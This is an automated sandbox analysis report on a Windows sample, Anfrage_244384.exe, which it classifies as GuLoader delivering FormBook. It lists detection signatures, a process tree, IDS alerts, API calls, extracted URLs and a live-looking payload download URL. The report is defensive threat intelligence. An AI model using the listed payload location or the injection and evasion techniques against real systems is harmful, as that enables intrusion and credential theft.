Edit tour

Windows Analysis Report
Anfrage_244384.exe

Overview

General Information

Sample name:	Anfrage_244384.exe
Analysis ID:	1550253
MD5:	b03f23199ae987a7bce0ff1a0d742e3e
SHA1:	f454c8de72926ee9f98db7056fa89f0c3ada9666
SHA256:	eda014e3b658bfbbfd141c1459a3414d9ee8b7c139a3976fe732141fa9cf3f80
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected FormBook

Yara detected GuLoader

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Anfrage_244384.exe (PID: 5308 cmdline: "C:\Users\user\Desktop\Anfrage_244384.exe" MD5: B03F23199AE987A7BCE0FF1A0D742E3E)

Anfrage_244384.exe (PID: 5608 cmdline: "C:\Users\user\Desktop\Anfrage_244384.exe" MD5: B03F23199AE987A7BCE0FF1A0D742E3E)

dptLotHBnXg.exe (PID: 3052 cmdline: "C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

verclsid.exe (PID: 1056 cmdline: "C:\Windows\SysWOW64\verclsid.exe" MD5: 190A347DF06F8486F193ADA0E90B49C5)

dptLotHBnXg.exe (PID: 3916 cmdline: "C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1832 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2597198603.0000000004A03000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 3 entries

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-06T16:10:51.193850+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.6	49753	TCP
2024-11-06T16:11:29.888003+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.6	49926	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-06T16:11:29.973578+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49927	188.40.95.144	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 15:12:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 65 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 76 61 72 75 73 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 8

Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://crl.apple.com/root.crl0
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: Anfrage_244384.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Anfrage_244384.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://www.apple.com/appleca0
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092816967.00000000046B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bin
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bin2
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.binA
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bink
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.binl
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bins
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: verclsid.exe, 00000007.00000002.3361368137.000000000083A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20M
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: verclsid.exe, 00000007.00000003.3288064546.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10334
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: https://www.apple.com/appleca/0
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_se
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_n
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_host
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/sozdanie-saita/
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.svarus.online&reg_source=parking_auto

Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927

Source: unknown

HTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.6:49927 version: TLS 1.2

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B35C0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C70 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DF0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3010 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3090 NtSetValueKey,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3D70 NtOpenThread,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3D10 NtOpenProcessToken,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B39B0 NtGetContextThread,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B4650 NtSuspendThread,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B4340 NtSetContextThread,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C60 NtCreateKey,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C00 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CF0 NtOpenProcess,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CC0 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CA0 NtQueryInformationToken,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D30 NtUnmapViewOfSection,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D00 NtSetInformationFile,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D10 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DD0 NtDelayExecution,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DB0 NtEnumerateKey,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2E30 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2EE0 NtQueueApcThread,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2EA0 NtAdjustPrivilegesToken,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2E80 NtReadVirtualMemory,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F60 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F30 NtCreateSection,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FE0 NtCreateFile,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FA0 NtQuerySection,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FB0 NtResumeThread,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F90 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AF0 NtWriteFile,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AD0 NtReadFile,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AB0 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2B60 NtClose,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BE0 NtQueryValueKey,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BF0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BA0 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2B80 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D4650 NtSuspendThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D4340 NtSetContextThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C70 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C60 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CA0 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D10 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D30 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DD0 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DF0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2EE0 NtQueueApcThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2E80 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F30 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FE0 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FB0 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AD0 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AF0 NtWriteFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2B60 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BE0 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BA0 NtEnumerateValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D35C0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D39B0 NtGetContextThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C00 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CC0 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CF0 NtOpenProcess,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D00 NtSetInformationFile,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DB0 NtEnumerateKey,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2E30 NtWriteVirtualMemory,
